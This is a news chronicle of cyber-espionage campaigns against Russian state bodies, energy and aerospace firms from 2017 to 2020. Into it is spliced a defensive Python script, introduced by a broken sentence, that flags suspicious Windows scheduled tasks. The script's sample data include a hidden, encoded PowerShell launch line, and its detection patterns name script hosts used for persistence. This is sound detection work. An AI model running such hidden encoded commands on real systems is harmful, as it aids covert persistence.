Preparations for a spy attack by a Chinese APT group on Russian fuel and energy complex enterprises discovered
On September 24, 2020, it became known that the developer of information security tools, Doctor Web, published a study of a phishing campaign that was aimed at Russian enterprises in the fuel and energy complex. The first wave was dated April 2020, the last manifestations of activity occurred in September 2020. Read more here.
90% of government agencies' IT systems in Russia can be hacked even by inexperienced cyber hooligans
About 90% of the IT systems of government agencies in Russia can be hacked not only by highly qualified hackers but also by inexperienced cyber hooligans. This conclusion is contained in a study prepared by Rostelecom-Solar based on the analysis of data on 40 state organizations and authorities at the federal and regional level. The report was published in September 2020.
According to Vladimir Dryukov, director of the Solar JSOC cyber attack monitoring and response center at Rostelecom-Solar, cyber hooligans aim at simple monetization: they encrypt servers and computers, mine cryptocurrency covertly, and build botnets from the captured resources to organize DDoS attacks or phishing mailings. More experienced specialists try to gain long-term control over the infrastructure or access to confidential data for the purpose of cyber espionage, he said.
Experts note a low level of "cyber hygiene" in government agencies. More than half of such institutions use an unprotected connection (most often the http protocol, in which transmitted data is not encrypted and can be intercepted).
More than 70% of organizations are exposed to classic web vulnerabilities that attackers use as an entry point into the victim's infrastructure: for example, SQL injection, which allows an attacker to break into the site's database and alter it, or an XSS vulnerability, with which an attacker can inject his own script into a page of the victim site.
In addition, more than 60% of government organizations have vulnerabilities in various components (the Apache web server, the Apache Tomcat application server, the WordPress content management system, the PHP language) and even in the operating system itself (the Shellshock series of vulnerabilities, considered among the most dangerous).[20]
2019
Hackers have been preparing attacks on the fuel and energy complex for years
Hackers have been preparing attacks on enterprises in the fuel and energy sector for years. This was announced on November 14, 2019 by Positive Technologies.
According to experts, professional cyber groups conducting targeted attacks do not destructively attack immediately after penetration. They can control all systems of the enterprise for several years without taking any destructive action, but only stealing important information and waiting for the right moment to launch an attack.
During the investigation of one of the incidents, experts discovered that the TaskMasters group, which was engaged in the theft of confidential documents and espionage, had been in the infrastructure of the victim company for at least 8 years.
Basically, hackers attack the fuel and energy complex in order to disrupt its production process or to steal corporate information and damage its reputation. Only one in three attacks is aimed at stealing funds, and most often companies are faced with information leaks or data substitution and destruction.
Cyber attacks on the fuel and energy complex that result in information leakage account for 30% of all incidents. In 26% of cases, data is destroyed or substituted. 25% of the enterprises surveyed said that their infrastructure was idle after the attacks.
According to Alexei Novikov, director of the Positive Technologies security expert center, it is very difficult to detect a targeted attack at the time of intruders entering the system. It is easier and more efficient to disclose the activity of a hacker after entering the infrastructure, for example, when it moves between servers already on the internal network.
| Such movements certainly leave artifacts in network traffic and on the nodes themselves, this allows you to detect the previous penetration retrospectively and eliminate the threat before the attacker proceeds to active destructive actions or steals important information, Novikov said.[21] |
Hackers from China attacked Russian government agencies for years
On May 13, 2019, it became known about the existence of a cyber group that had been attacking Russian government agencies and companies for several years, using the operating system's task scheduler to break in.
Positive Technologies named this hacker group TaskMasters for its use of the task scheduler to penetrate local networks. After breaking in, the hackers examined the networks for vulnerabilities, uploaded malware to them and engaged in espionage. How the attackers used the information obtained is unknown.
As Positive Technologies told Kommersant, a cyber group with supposedly Chinese roots attacked government agencies and companies for at least nine years, some of them in Russia. Experts know of the compromise of more than 30 significant organizations from industry, construction, energy, real estate and other sectors, 24 of them in Russia. The names of the companies were not disclosed.
According to Positive Technologies, the code of the tools used by TaskMasters contains mentions of Chinese developers, during some attacks connections from IP addresses from China were recorded, and keys for some versions of programs can be found on the forums where residents of this country communicate.
Kaspersky Lab says it has been monitoring the activity of the same group, which it calls BlueTraveler, since 2016. It names government agencies, mainly from Russia and the CIS, as the targets of its attacks, and confirms that the attackers most likely speak Chinese.
Kaspersky Lab adds that the method of gaining a foothold in the infrastructure and spreading further using the task scheduler has long been in use and is often employed by cybercriminals. As a rule, such attacks serve political intelligence or industrial espionage, the company noted.[22]
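Novikov's point above, that movement between servers leaves artifacts on the nodes themselves, and the task-scheduler technique attributed to TaskMasters, as an added defensive example that is not part of the original article or of any vendor's product: it triages constructed Windows Security event 4698 ("A scheduled task was created") records, flagging tasks that run from user-writable directories or launch an encoded PowerShell command, and task names that appear on several hosts within a short window. The sample events, host and task names, thresholds and heuristics are all assumptions.

```python
import re
import xml.etree.ElementTree as ET
from collections import defaultdict
from datetime import datetime, timedelta

# Minimal TaskContent XML as carried in Security event 4698 ("A scheduled task was created").
TASK_XML = ('<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"><Actions><Exec>'
            '<Command>{cmd}</Command><Arguments>{args}</Arguments></Exec></Actions></Task>')

def _event(ts, host, name, cmd, args=""):
    return {"time": datetime.fromisoformat(ts), "host": host, "task_name": name,
            "task_content": TASK_XML.format(cmd=cmd, args=args)}

# Constructed sample records (not from any real incident): a benign backup job, one task
# registered on three hosts within minutes, and a task that runs an encoded PowerShell command.
SAMPLE_EVENTS = [
    _event("2021-03-01T02:00:00", "ws-01", "\\Backup\\Nightly", "C:\\Program Files\\Backup\\backup.exe", "/full"),
    _event("2021-03-01T03:10:00", "ws-02", "\\Microsoft\\Windows\\UpdCheck", "C:\\ProgramData\\upd\\svc.exe"),
    _event("2021-03-01T03:14:00", "ws-03", "\\Microsoft\\Windows\\UpdCheck", "C:\\ProgramData\\upd\\svc.exe"),
    _event("2021-03-01T03:19:00", "ws-04", "\\Microsoft\\Windows\\UpdCheck", "C:\\ProgramData\\upd\\svc.exe"),
    _event("2021-03-01T09:00:00", "ws-05", "\\Maint",
           "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "-nop -w hidden -enc AAAA"),
]

# Assumed heuristics: directories a legitimate job rarely runs from, script hosts,
# and the usual abbreviations of PowerShell's -EncodedCommand switch.
WRITABLE_PATH = re.compile(r"\\(Temp|AppData|ProgramData|Users\\Public)\\", re.I)
INTERPRETER = re.compile(r"\\(powershell|cmd|mshta|rundll32|regsvr32)\.exe$", re.I)
ENCODED_ARGS = re.compile(r"(^|\s)-e(c|nc?|ncodedcommand)?(\s|$)", re.I)

def parse_task_content(xml_text):
    """Return (command, arguments) from the TaskContent XML, ignoring the schema namespace."""
    found = {el.tag.rsplit("}", 1)[-1]: (el.text or "").strip()
             for el in ET.fromstring(xml_text).iter()}
    return found.get("Command", ""), found.get("Arguments", "")

def score_task(event):
    """Reasons one registration looks like persistence rather than routine admin work."""
    command, args = parse_task_content(event["task_content"])
    reasons = []
    if WRITABLE_PATH.search(command):
        reasons.append("executable lives in a user-writable directory")
    if INTERPRETER.search(command) and ENCODED_ARGS.search(args):
        reasons.append("script interpreter launched with an encoded command")
    return reasons

def detect_lateral_spread(events, min_hosts=3, window=timedelta(minutes=30)):
    """Task names registered on at least min_hosts distinct hosts inside one time window."""
    by_name = defaultdict(list)
    for e in events:
        by_name[e["task_name"].lower()].append((e["time"], e["host"]))
    spread = {}
    for name, regs in by_name.items():
        regs.sort()
        for start, _ in regs:
            hosts = {h for t, h in regs if start <= t <= start + window}
            if len(hosts) >= min_hosts:
                spread[name] = sorted(hosts)
                break
    return spread

def triage(events):  # one (host, task_name, reasons) alert for every event that trips a check
    spread = detect_lateral_spread(events)
    alerts = []
    for e in events:
        reasons = score_task(e)
        if e["task_name"].lower() in spread:
            reasons.append("same task registered on %d hosts within 30 min" % len(spread[e["task_name"].lower()]))
        if reasons:
            alerts.append((e["host"], e["task_name"], reasons))
    return alerts
```

On a real estate, the same checks would be fed from forwarded 4698 events rather than the inline list; the cross-host check is the one that a per-host view cannot make.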
2018: In 2018, about 4.3 billion cyber attacks were committed on the Russian Federation
According to the National Coordination Center for Computer Incidents, in 2018, more than 4.3 billion cyber attacks were carried out on critical infrastructures of the Russian Federation. This was announced in August 2019 by the Deputy Secretary of the Security Council of the Russian Federation Oleg Khramov in an interview with Rossiyskaya Gazeta.
According to Khramov, the number of cyber attacks over the past six years has grown by 57%. If for the period from 2014 to 2015, cases of coordinated targeted attacks amounted to about 1.5 thousand per year, then in 2018 their number exceeded 17 thousand. Attacks aimed at disabling equipment of critical infrastructure facilities pose a particular danger.
Since the beginning of 2019, the introduction of malicious software on more than 7 thousand objects of critical infrastructures has been prevented. The targets of the attackers' attacks were objects of the credit and financial sphere (38% of all attacks), government bodies (35%), the defense industry (7%), the field of science and education (7%) and the health sector (3%).
According to the American company Webroot, in 2018, the United States accounted for 63% of Internet resources that distribute malware, while the share of China and Russia is only 5% and 3%, respectively.
2017
Danish Defense Ministry: Russian hackers hacked the mail of our employees for two years
Hackers from Russia associated with the country's leadership had access to the electronic mailboxes of the Danish Ministry of Defense for two years. This was announced in April 2017 by the country's Minister of Defense, Claus Hjort Frederiksen.
The report, cited by Berlingske, reports that during 2015 and 2016, hackers from the Fancy Bear group had access to the unclassified mail content of some military officials.
According to the publication, "for a long time, hackers sent a large number of emails to specific employees in the Ministry of Defense." Employees received messages saying that "the system requires an update" and that they must enter their passwords. To mislead ministry employees, the hackers used fake login pages that replicated the ministry's pages. In addition, the newspaper reports, the purpose of the alleged hackers could have been not only to obtain the necessary information but also the possible recruitment of agents from among the ministry's employees.
It is noted that the hack became possible because not all mailboxes were sufficiently protected. This problem has now been eliminated.[23][24]
Russian aerospace industry attracts growing interest of Chinese cyber spies
In February 2017, it became known that Chinese hackers began to intensively attack aerospace companies in Russia and Belarus. This conclusion was made by Proofpoint experts monitoring the activities of the group, previously seen in attacks on government structures and commercial companies around the world.[25]
Hackers allegedly acting in the interests of the PRC government used the NetTraveler Trojan and the PlugX remote administration tool. With their help, criminals carried out espionage activities around the world.
Starting in the summer of 2016, this group began to use a new malware called ZeroT, which, after entering the system, downloads and installs PlugX.
ZeroT itself is distributed using spear-phishing (narrowly targeted) emails containing attachments in HTML Help (.chm) format. The hackers used .chm documents with executable files embedded in them. User Account Control (UAC) responded properly to attempts to open these .chm files (in reality, attempts to run the executable components), but in at least a few cases users "obediently" contributed to the infection.
This is in no small part due to the effectiveness of phishing email subject lines such as "2017-2020 Federal Target Program", "Changes in the list of affiliates as of 21.06.2016", and so on.
Hackers also actively exploited the CVE-2012-0158 vulnerability by sending Microsoft Word files with exploits, as well as self-extracting .rar files containing components to bypass the audit trail.
China is regularly accused of active cyber espionage against other countries. The PRC authorities categorically deny all accusations, but cybersecurity experts around the world have gained sufficient evidence that the PRC armed forces have units engaged in cyber espionage and cyber attacks.
| Cyber espionage, like traditional espionage, has long been a factor in international politics that has to be constantly kept in mind, says Dmitry Gvozdev, CEO of Security Monitor. We live in an era of a "cold cyber war" of global proportions. Any industry of strategic importance becomes an object of unfriendly interest, and attempts at attacks are only a matter of time. As for their success, it all depends on how ready the personnel of the attacked organizations are for an attack, whether they know how to identify attempted cyber attacks and distinguish phishing emails from legitimate ones, and how closely IT personnel monitor timely software updates. |
Notes
- ↑ Service outages, schedule changes possible
- ↑ Attackers attack Russian government agencies through LiveJournal
- ↑ Data storage will be protected by requirements
- ↑ "Slumdog millionaires", which
- ↑ How an Indian startup hacked the world
- ↑ Expert named the main reasons for successful cyber attacks on enterprises and government agencies
- ↑ Subject protection
- ↑ The FSB of Russia suppressed the illegal activities of a Russian citizen who committed high treason in the Kemerovo region
- ↑ Kaspersky Lab detected attacks on Russian institutions to steal data
- ↑ Almost half of Russian departments were subjected to cyber attacks
- ↑ Chinese hackers have attacked Russian government agencies, defense and state-owned companies without explanation
- ↑ Positive Technologies: government agencies are the worst protected from cyber attacks
- ↑ Hackers took on officials. Experts found a cyber attack on government officials
- ↑ US ambassador summoned to Russian Foreign Ministry due to interference in Russian elections
- ↑ Chinese government hackers first attacked Russian companies.
- ↑ The number of cyber attacks on critical infrastructure of the Russian Federation has increased by 150%.
- ↑ Step back. Russian science is attacked by superior forces of foreign hackers
- ↑ Patrushev: 120 thousand cyber attacks were committed on the IT systems of government agencies, banks and the fuel and energy complex of Russia for the year
- ↑ Hackers have become more likely to attack authorities, the Cyber Threats Center said
- ↑ Rostelecom-Solar named key vulnerabilities in the IT infrastructures of state organizations and authorities
- ↑ Hackers prepare attacks on the fuel and energy complex for several years
- ↑ Hackers built into the system
- ↑ Danish Ministry of Defense: Russian hackers hacked the mail of our employees for two years (https://meduza.io/news/2017/04/23/minoborony-danii-rossiyskie-hakery-dva-goda-vzlamyvali-pochtu-nashih-sotrudnikov)
- ↑ Ibid.
- ↑ Oops, they did it again: APT Targets Russia and Belarus with ZeroT and PlugX